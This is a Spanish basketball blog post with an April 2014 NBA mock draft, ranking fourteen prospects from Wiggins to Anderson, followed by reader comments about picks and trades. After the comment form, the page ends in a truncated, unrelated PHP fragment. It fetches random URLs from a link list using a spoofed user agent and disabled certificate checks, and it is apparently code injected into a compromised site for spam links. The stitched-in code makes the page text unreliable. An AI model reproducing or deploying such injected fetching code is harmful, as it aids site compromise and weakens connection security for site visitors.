Mock Draft 2014 3.0

28 de April de 2014 por Jose_Dantley

Como suele ser habitual, la March Madness no ha sido decisiva para determinar el orden final del draft 2014. El torneo universitario es otra historia. Cierto que Shabazz Napier ha escalado muchas posiciones respecto a nuestro último mock o que James Young ha reforzado su posición de lotería pero los grandes batacazos como los de Parker o Wiggins afectarán, si lo hacen, muy poco a la decisión final de los GM de la NBA. Si nos tuviéramos que quedar con un hecho realmente significativo serían los problemas físicos de Embiid que en un jugador de su estatura suelen causar alguna caída en el draft.

March Madness aparte, el mapa de los jugadores que se presentan se va esclareciendo. A día de hoy, entre los jugadores que podían optar a lotería, solo Wayne Selden -ya se esperaba-, Willie Cauley-Stein y Montrezl Harrell han decidido quedarse un año más “estudiando”. Por otro lado, Dario Saric parece tener apalabrado el contrato con el Efes Pilsen. Su agente ha indicado que entrará en el draft pero no descarta retirarse si no consigue un top-10. A falta de más información, dejamos fuera a Saric.

Todavía con algún jugador por decidir como los hermanos Harrison, nuestro mock, como siempre con su punto de riesgo, es el siguiente:

1. Andrew Wiggins – 6’8″ – Kansas – SF

2. Joel Embiid – 7’0″ – Kansas – C

3. Jabari Parker – 6’8″ – Duke – SF/PF

4. Julius Randle – 6’9″ – Kentucky – PF

5. Dante Exum – 6’6″ – Australia – PG

6. Noah Vonleh – 6’10” – Indiana – PF

7. Doug McDermott – 6’7″ – Creighton – SF

8. Marcus Smart – 6’4″ – Oklahoma State – PG

9. Aaron Gordon – 6’8″ – Arizona – SF/PF

10. Nik Stauskas – 6’6″ – Michigan – SG

11. Gary Harris – 6’4″ – Michigan State – SG

12. James Young – 6’7″ – Kentucky -SG/SF

13. Tyler Ennis – 6’2″ – Syracuse – PG

14. Kyle Anderson – 6’9″ – UCLA – SF/PF

Salen de la lista Saric por lo comentado anteriormente y Rodney Hood por no dar el paso adelante. Entran Young y Anderson. 

Rectificamos respecto al anterior mock y situamos a Wiggins como número 1. Andrew Wiggins realizó algunos partidos de mérito antes de estrellarse en la fase final. No obstante, su potencial es evidente y las noticias de las dudas físicas de Embiid han acabado de propinarnos el empujón que necesitábamos. No es que sea muy preocupante la lesión de espalda de Joel Embiid pero parece que ya en high school sufrió de algún problema similar. En hombres altos suele significar pérdida de puestos en el draft como sucedió el año pasado con Noel y, en menor medida con Len.

Doug McDermott es muy bueno. A estas alturas ya deberíais saberlo. ¿Algún GM se atreverá? Personalmente lo haría sin dudar, como elegiría a Nik Stauskas en el 10.

Reconocemos por otro lado que Aaron Gordon no tiene posición de descanso. Sigue teniendo los mismos problemas pero su actitud y condiciones físicas le pueden valer para ser top-10. En el caso de Smart, el paso del tiempo ha generado dudas.

James Young está en lotería por puro potencial, refrendado por una Final Four fabulosa que no pudo rubricar con el título pero que le disparó en las quinielas del draft. Puede ser un buen tirador -no lo es todavía-, y es un gran penetrador como dejó constancia en los últimos partidos.

Kyle Anderson es el jugador más inclasificable de nuestra lista. Mide lo que un buen PF, pasa como el mejor base.  Como siempre, el nombre de Magic Johnson sale a la palestra.  Así que no nos equivocamos en situar a Anderson entre Magic como “best case” y Sun Yue como “worst case”. Ya algo más en serio, no parece que la posición de base pueda ser su lugar natural en la NBA por pura cuestión de rapidez de movimientos, pero puede ser un “point forward” si encuentra el ambiente adecuado. Me recuerda en parte a Michael Carter-Williams en algunos movimientos y al gran Royce White en otros. Algún equipo arriesgará, por lo que lo situamos en lotería.

Por debajo hay jugadores que pueden dar la sorpresa, entre ellos varios ACB. Estamos expectantes sobre si Hezonja y Porzingis entran en el draft. Por potencial podrían ser top-10 si algún equipo se la juega. Nurkic puede ser otro candidato si se buscan centímetros con movilidad interior.

Continuaremos actualizando, especialmente si se producen grandes sorpresas en los jugadores que entran en la lista.

Comenta

34 comentarios a esta entrada

  1. Dantley dice:
    #1

    Actualizamos con la entrada oficial de Saric, aunque sigue siendo probable que se retire antes de la fecha del draft.

      Citar

  2. Esteban dice:
    #2

    mucho se habla del potencial de embidd y wiggins y los mock los ponen como 1 y 2, pero a la hora de la verdad, el que tenga el puesto 1, no podrá dejar pasar a Parker, simplemente ya sera demasiado bueno en su primer año para apostar por otros tíos por mas potencial que tengan

      Citar

  3. Jose Luis dice:
    #3

    Y el número 1, para los Cavs… joputas xdddd

    1) Cavs
    2) Bucks
    3) Sixers
    4) Magic
    5) Jazz
    6) Celtics
    7) Lakers
    8) Kings
    9) Bobcats
    10) Sixers

    ¿Como lo veis? ¿Smart caerá al 7? 😛 Sixers, Jazz, Celtics tienen base por ahora, ¿se lo llevará el Magic para descargar a Oladipo del balón?

      Citar

  4. Vader dice:
    #4

    A loa Magic se decia que les gustaba más Exum. Que suerte los Cavs!!!

    Saludos

      Citar

  5. Simon dice:
    #5

    Ahora que van a hacer los Cavs?? Nos sorprenderán con un Vonleh o un Gordon con el pick 1??? Con el buen ojo que tienen no me extrañaría…

      Citar

  6. rumbero dice:
    #6

    Simon:
    Ahora que van a hacer los Cavs?? Nos sorprenderán con un Vonleh o un Gordon con el pick 1??? Con el buen ojo que tienen no me extrañaría…

    Jaja a saber. Viendo lo de Bennet por eso igual este año se dejan de tonterias y van directamente a por Wiggins. En cualquier caso lo de los Cavs y el nº1 parece ya lo de Fabra y la lotería.

      Citar

  7. Ruxixon dice:
    #7

    Vaya coña tienen estos de Cleveland,cualquiera pensaría que la NBA le debe algo por lo de LeBron…madre mía.

      Citar

  8. Vader dice:
    #8

    rumbero: Jaja a saber. Viendo lo de Bennet por eso igual este año se dejan de tonterias y van directamente a por Wiggins. En cualquier caso lo de los Cavs y el nº1 parece ya lo de Fabra y la lotería.

    Yo creo que apostaran por Jabari Parker. Me parece el pick más seguro y que más encaja con sus necesidades. Luego no me extrañaria que hicieran algún traspaso por Waiters o Thompson.

    Los Bucks creo que iran a por Wiggins y los Sixers si se cumple todo lo demás podrian pillar a Embiid y hacer unas twin towers con Noel.

    Esa es mi apuesta 😀

      Citar

  9. Jose Luis dice:
    #9

    Pues a mi Embiid y Noel juntos… no sé :S ¿alguno tiene rango de tiro? Me parece que no.

      Citar

  10. Esteban dice:
    #10

    que lejos han quedado los Lakers, el pick 7 que feo

    justamente este draft parece tener 5/6 jugadores franquicia si se quiere, la calidad de tal de Smart, Randle o Vonleh esta en duda, y el peor de ellos 3 quedara septimo y les caera a los lakers

    ua verdadera pena, ojala que al menos les caiga smart

      Citar

  11. Vader dice:
    #11

    Esteban:
    que lejos han quedado los Lakers, el pick 7 que feo

    justamente este draft parece tener 5/6 jugadores franquicia si se quiere, la calidad de tal de Smart, Randle o Vonleh esta en duda, y el peor de ellos 3 quedara septimo y les caera a los lakers

    ua verdadera pena, ojala que al menos les caiga smart

    Ya veremos, muchos jugadores franquicia actuales han salido por debajo del número siete. Veremos…

      Citar

  12. Denise dice:
    #12

    La puta madre de los Cavaliers…otra vez pick 1?? Venga ya hombre, menos mal que no son un equipo precisamente glamouroso como los Knicks ó los Lakers si no pensaríamos ya en una mano negra..

    A dia de hoy, creo que los picks serán:
    1- Cavs: Joel Embiid:
    Creo que los Cavs aun mantienen esperanzas en pillar a Lebron este verano, por lo que verían bien draftear a este perro grande que le tape los agujeros en la zona antes que a Wiggins/Parker. Viendo el buen ojo de los Cavs…, no sería de extrañar que lo elijan y luego Embiid resulte ser un paquete con dolores continuos de espaldas y lesiones.

    2- Bucks: Jabari Parker.
    Con Antetokoumpo ya tienen a ese exterior que defienda, baje el culo y no necesite muchos tiros para ser protagonista, por lo que draftear a Wiggins podría ser redundante. Mejor pillar a un anotador compulsivo como Jabari Parker que buena falta les hace.

    3. 76ers: Andrew Wiggins.
    Creo que sería el pegamento perfecto para este equipo. Con la gran temporada rookie de MCW, lo que se espera de Noel y un agente libre importante que creo que van a fichar este verano, las carencias ofensivas que pueda tener Wiggins en su año rookie pueden disimularse, y no necesariamente ser el primer espada de su equipo en su año rookie.

    4. Orlando: Dante Exum.
    Mmmm, Creo que los Magic van a comerse la cabeza hasta el último momento sobre pillar a Smart ó a Exum. El hecho de que el de Oklahoma State los dejara plantado en el Draft del año pasado no gustó, y creo que los de Florida se la van a jugar por el australiano. La verdad es que quien draftee a este muchacho debe tener unos huevos muy gordos, porque yo me lo pensaría. Mucho potencual sí, pero poco demostrado en una competición de cierto nivel. Otra posibilidad que contemplo es que los Magic le traspasen y lo empaqueten con Afflalo por un jugador mediatico que desde el minuto 1 venda abonos y camisetas ¿Rajon Rondo?

    5. Utah Jazz: Julius Randle
    Con Favors recien renovado, quizás Randle no es muy útil para los Jazz, por lo que creo que quién elijan aquí va a ser empaquetado a algún sitio en busca especialmente de un 3 en caso de queGordon Hayward se pire (bastante probable)

    6. Boston Celtics: Noah Vonleh
    Si Randle ha sido ya elegido, creo que irán a por un tio que refuerce su pintura, y el mejor de los que queda es Noah Vonleh quien creo que será un asiduo al doble-doble en la liga. Otra opción es pillar a Smart y traspasar a Rondo por un interior.

    7. Lakers: Marcus Smart
    Si el base llega disponible hasta aquí, claramente es el hombre para el equipo angelino. Kobe con la edad y las lesiones que tiene ya, necesita a un tio al lado suya en el backcourt que cree jugadas, tiros y genere ventajas.

    8. Kings. Aaron Gordon
    Sancho sabe más que yo de esto, pero a los Kings les hace falta una cara nueva en el PF. A mi lo que he visto de este tio no me dice mucho, pero por necesidades del equipo entiendo que su elección sería la más adecuada.

    9. Hornets: Dario Saric.
    Con Holiday, Davis, Gordon y Anderson tienen puntos de sobra por lo que draftear al croata me parecería lo más adecuado. Un tio ideal, que no se va a tocar las pelotas, no va a ser problematico, y garantiza la busqueda del exito colectivo.

    10. 76ers: Gary Harris
    Los 76ers necesitan un SG como el comer y Harris es el hombre adecuado.

    11. Denver: James Young
    Otro que necesita un SG como el comer . Apuesto por James Young aunque no descartaría que drafteasen a un PG como Napier.

    12. Orlando. Doug McDermott
    Creo que en su segunda elección, Orlando va a ir a por Saric, pero como creo que va a salir antes, estoy en duda entre Rodney Hood y McDermott. Quizás Hood es una elección más segura, pero la falta de tiro exterior de los de Florida hace que me decante por el blanco.

    13. Wolves. Shabazz Napier
    Viendo que Barea no tiene mucho más que ofrecer y que el último año de Ricky ha sido a mi juicio malo y decepecionante, no estaría mal meterle presión al español drafteando al MVP de la NCAA

    14. Phoenix Suns. Clint Capela
    Sé que es arriesgado, pero los Suns necesitan altura e intimidación, mucho más a raiz del fracaso de Len, por lo que draftear al francés me parecería cojonudo.

      Citar

  13. Jose Luis dice:
    #13

    Gracias Denise por tu mock draft. A ver si se mojan los eruditos de la página, queremos un mock draft oficial! 😀

    A mi Parker me genera dudas… ¿no será parecido a Derrick Williams?

      Citar

  14. Esteban dice:
    #14

    Jose Luis:
    Gracias Denise por tu mock draft. A ver si se mojan los eruditos de la página, queremos un mock draft oficial!

    A mi Parker me genera dudas… ¿no será parecido a Derrick Williams?

    no ni en figuritas, al menos lo que he visto yo, Parjer tiene todos los movimientos de un jugador 3 fuerte, pero suficientemnete agil para el puiesto y con tiro en suspension, giros y lanzamiento exterior que nunca podra tener williams,

    sin dudas parker sera un 3 muy muy anotador en la liga

      Citar

  15. Esteban dice:
    #15

    los lakers igualmente deben estar agradeciendole a dios la profundidad de este draft, fichar a Vonleh, Randle o Smart con un pick 7 no se da todos los dias, en el draft pasado cualquiier de los 3 podria haber sido top3

    despues puede salir chicha o limonada, pero el potencial esta ahi al menos al dia de hoy
    una pena que no puedan elegir, ya que el que quede de esos 3 se llevaran, pero de poder elegir yo iria con Smart, que tiene pinta de base titular para rato en la liga

      Citar

  16. Denise dice:
    #16

    Jose Luis:
    Gracias Denise por tu mock draft. A ver si se mojan los eruditos de la página, queremos un mock draft oficial!

    A mi Parker me genera dudas… ¿no será parecido a Derrick Williams?

    Gracias.
    Respecto a lo de Parker, uno nunca sabe..pero a dia de hoy y con los videos que hay de él, el repertorio ofensivo que tiene Jabari no lo consigue Derrick Williams ni en 50 vidas.La verdad es que el de los Kings, nunca me ha gustado, me parece un jugador que solo vale en un estilo muy ofensivo y dinámico. En estático se pierde, y en definitiva, para mí no deja de ser un jugador de rotación.
    Lo único que le salva de haber sido elegido en un pick 2 y no considerarse un fracaso, es que su Draft no es precisamente una maravilla y hay bastantes castañas (Vesely, Biyombo, Fredette) y otros decentes jugadores que a mi gusto han rendido por debajo del potencial y el nivel que se esperaba de ellos (Tristan T, Valanciunas y Brandon Knight)

    Volviendo con Jabari, la mayoría de la gente lo compara con Melo, yo lo compararía más con Jamal Mashburn y unas gotitas de Paul Pierce.

      Citar

  17. Jose Luis dice:
    #17

    Pues Jabari tiene buen manejo, pero muy ágil no me parece. Habrá que verle en la liga

      Citar

  18. Denise dice:
    #18

    Bueno, pues se habla que Orlando quiere a Lee, y a su vez Warriors quiere a Love.
    He estado haciendo números y joder, podrían hacer un traspaso como este que creo que sería harto beneficioso para los 3 equipos.

    Orlando – Consigue a David Lee
    Warriors – Consiguen a Kevin Love y a Afflalo
    Wolves- Consiguen a Harrison Barnes, Klay Thompson, Andrew Nicholson, Speights + pick 12 de Orlando

      Citar

  19. Simon dice:
    #19

    Yo creo que ahí Orlando tendría que recibir algo más a cambio. Aunque en realidad parece que sobre en la reconstrucción… Afflalo hoy en día es de los mejores en su posición y si le sumas el pick 12 a David Lee que es un buen jugador pero que no te va a marcar diferencias ni te va a dar ese punto de competitividad para liderar al equipo… pues se me antoja corto la verdad.

      Citar

  20. Esteban dice:
    #20

    Denise:
    Bueno, pues se habla que Orlando quiere a Lee, y a su vez Warriors quiere a Love.
    He estado haciendo números y joder, podrían hacer un traspaso como este que creo que sería harto beneficioso para los 3 equipos.

    Orlando – Consigue a David Lee
    Warriors – Consiguena Kevin Love y a Afflalo
    Wolves- Consiguen a Harrison Barnes, Klay Thompson, Andrew Nicholson, Speights + pick 12 de Orlando

    vaya que tiene sentido lo que planteas, pero demasiado completo para realizarse

    un 5 inicial de los Warriors, con Curry, Afflalo, Iguodola, Love y Bogut mete MIEDO O TERROR, por los proximos 4 o 5 años al menos

    Orlando, consigue un jugador que puede aportar sin entregar casi nada, como Nicholson y el pick 12; Lee vale mas que eso

    Wolves, mejor no podrian salir de la situacion de LOVE , en un año no sacaran nada y ahora se llevan a un Barnes y Thompson, mas nicholson y un pick 12, mas no creo que puedan conseguir

      Citar

  21. Esteban dice:
    #21

    es mas, meter a dops tiradores como Curry y Love, junto a 3 defensores de nivel como Afflalo, Iguodala y Bogut, serie encajar a la perfeccion, siendo estos 3 jugadores definidamente de rol, que no necesitaran juigadras ara producir y que pueden aprovechar lo que sobre de curry y love

      Citar

  22. Esteban dice:
    #22

    hay que ver que hacen los Cavaliers, con TAAAANTO ESPACIO Y TAAAANTO POTENCIAL

    Los cavs pueden darse el lujo de arrancar a planificar su proxima plantilla solo con Irving y sus 5 millones, eso si es bueno

    el pick 1 es mas de lo que los Wolves podran sacar por Love

    Mientras que Waiters y Thompson tienen un buen mercado para hacerse con algun veterano de nivel y con buen contrato,

    alguien aun vera potencial en Bennet y no hay que olvidarse de ZELLER, a cambio de ellos pueden conseguirse dos otro jugador de algo de renombre para sumarse a Love e irving (un centro como asik, un escolta como Afflalo, un centro como Monroe, un ala como Josh Smith, un base como Jennings) y aun les quedaria cierto espacio para ofrecerle a james

    hay dinero y hay jovenes, la ultima vez que vi algo similar, fue en los Celtics previo a formarse el Big 3

      Citar

  23. franitis dice:
    #23

    En Celtic’s Blog he leído un mock draft en el que los Celtics cogerían al PF croata Darío Sariç… ¿Qué os parece?

    http://www.celticsblog.com/2014/5/21/5736650/kevin-oconnors-2014-nba-mock-draft-2-0-lottery-embiid-wiggins-analysis-parker-exum-gordon-randle

      Citar

  24. Denise dice:
    #24

    Esteban:
    Orlando, consigue un jugador que puede aportar sin entregar casi nada, como Nicholson y el pick 12; Lee vale mas que eso

    Entregaría a Affalo también. (Afflalo, NIcholson+pick 12 por Lee)

      Citar

  25. Jose Luis dice:
    #25

    Denise: Entregaría a Affalo también.(Afflalo, NIcholson+pick 12 por Lee)

    A mi eso me parece demasiado, Lee está en decadencia y dudo que le queden 2-3 años buenos. Además no sé para qué les sirve Lee ahora, ¿les llegaría para entrar a PO soltando a Afflalo? Lo dudo.

      Citar

  26. Ruxixon dice:
    #26

    Ojo que en ese mock,los Hornets es Charlotte,no los Pelicans de New Orleans.

      Citar

  27. Vader dice:
    #27

    ¿Que día es la elección del draft? ¿Sabeis si los del plus lo retransmiten en directo?

    Gracias!!

      Citar

  28. Denise dice:
    #28

    Vader:
    ¿Que día es la elección del draft? ¿Sabeis si los del plus lo retransmiten en directo?

    Gracias!!

    Madrugada del jueves al viernes 26.
    Desconozco si lo echan en el plus, pero yo el año pasado lo ví en Rojadirecta en directo. Si no, en Marca no lo echan pero si van dando las elecciones en directo, y se puede debatir bastante bien en el foro de comentarios porque los que están viendo el Draft en directo a las 2 de la madrugada son gente que entiende y les gusta de verdad el baloncesto. En ese momento, no encuentras trolls ni futboleros.

      Citar

  29. Denise dice:
    #29

    Denise: Madrugada del jueves al viernes 26.
    Desconozco si lo echan en el plus, pero yo el año pasado lo ví en Rojadirecta en directo. Si no, en Marca no lo echan pero si van dando las elecciones en directo, y se puede debatir bastante bien en el foro de comentarios porque los que están viendo el Draft en directo a las 2 de la madrugadason gente que entiende y les gusta de verdad el baloncesto. En ese momento, no encuentras trolls ni futboleros.

    Se me olvidó la hora, es a las 1 de la madrugada, aunque el año pasado empezó como 25 minutos más tarde de la hora prevista.

      Citar

  30. Denise dice:
    #30

    Jose Luis: A mi eso me parece demasiado, Lee está en decadencia y dudo que le queden 2-3 años buenos. Además no sé para qué les sirve Lee ahora, ¿les llegaría para entrar a PO soltando a Afflalo? Lo dudo.

    Bueno, yo no creo que Lee esté en decadencia. Le quedan 2 años de contrato y en esos 2 años va a seguir siendo un pedazo jugador. Lo importante de fichar a Lee, es que ya al menos tienes a un tio con categoría All-Star que puede provocar un efecto llamada y que algún agente libre interesante se interese por fichar por los Magic (que tienen espacio de sobra). Lo peor de Lee, es que junto a Vucevic haría una pareja muy blandita en defensa.

    Y Afflalo ha hecho un pedazo temporada, pero más de lo que ha dado ya no va a dar, su rendimiento está más que amortizado y si los Magic, como todo el mundo espera draftean a Smart/Exum, hay que dejar mucho minutos en el SG para que Oladipo se desarrolle.

      Citar

  31. Denise dice:
    #31

    Ruxixon:
    Ojo que en ese mock,los Hornets es Charlotte,no los Pelicans de New Orleans.

    Tienes razón, la elección es de Charlotte. De igual forma, a los ex-Bobcats también les viene bien Saric.
    Quizás soy el único, pero me molaba el nombre y el logo de los Bobcats..

      Citar

  32. Vader dice:
    #32

    Denise: Madrugada del jueves al viernes 26.
    Desconozco si lo echan en el plus, pero yo el año pasado lo ví en Rojadirecta en directo. Si no, en Marca no lo echan pero si van dando las elecciones en directo, y se puede debatir bastante bien en el foro de comentarios porque los que están viendo el Draft en directo a las 2 de la madrugadason gente que entiende y les gusta de verdad el baloncesto. En ese momento, no encuentras trolls ni futboleros.

    Gracias Denise.

    No, en directo a esas horas no me quedaré a verlo por ningún lado. Pero si lo dan en el Plus lo grabaré y al día siguiente lo veo con toda la calma… 😀 Ya ire mirando la programación.

    Una duda, dices el 26, ¿Te refieres a Junio cierto?

    Saludos

      Citar

  33. Denise dice:
    #33

    Vader: Gracias Denise.

    No, en directo a esas horas no me quedaré a verlo por ningún lado. Pero si lo dan en el Plus lo grabaré y al día siguiente lo veo con toda la calma… Ya ire mirando la programación.

    Una duda, dices el 26, ¿Te refieres a Junio cierto?

    Saludos

    Si, 26 de Junio.
    Ver el Draft entero hasta el pick 60 es morirse porque creo que dura como 5 horas, ten en cuenta que hay 5 minutos de reflexión entre cada pick de 1º ronda y creo que 3 minutos entre los de 2º ronda. Pero si haces como yo el año pasado, que solo ví los 12 primeros picks,…en una hora y cuarto lo tienes visto.
    Yo, si no me pasa nada, lo veré en directo y a ver si os animais más, que el año pasado estuve solo de madrugada comentandolo jeje.

      Citar

  34. Vader dice:
    #34

    No, si ya me gustaria ya… Pero si ese viernes trabajo va a ser que no me quedo hasta tan tarde XD.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>